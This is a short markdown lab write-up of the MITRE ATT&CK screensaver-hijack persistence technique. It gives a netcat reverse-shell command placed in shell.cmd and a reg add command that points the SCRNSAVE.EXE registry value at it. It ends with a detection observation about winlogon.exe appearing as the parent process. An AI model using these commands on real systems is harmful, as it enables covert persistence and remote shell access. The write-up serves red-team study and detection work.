Skip to content

Latest commit

 

History

History
46 lines (27 loc) · 1.21 KB

t1180-screensaver-hijack.md

File metadata and controls

46 lines (27 loc) · 1.21 KB
description
Hijacking screensaver for persistence.

T1180: Screensaver Hijack

Execution

To achieve persistence, the attacker can modify SCRNSAVE.EXE value in the registry HKCU\Control Panel\Desktop\ and change its data to point to any malicious file.

In this test, I will use a netcat reverse shell as my malicious payload:

{% code title="c:\shell.cmd@victim" %}

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

{% endcode %}

Let's update the registry:

The same could be achieved using a native Windows binary reg.exe:

{% code title="attacker@victim" %}

reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd

{% endcode %}

Observations

Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1180" %}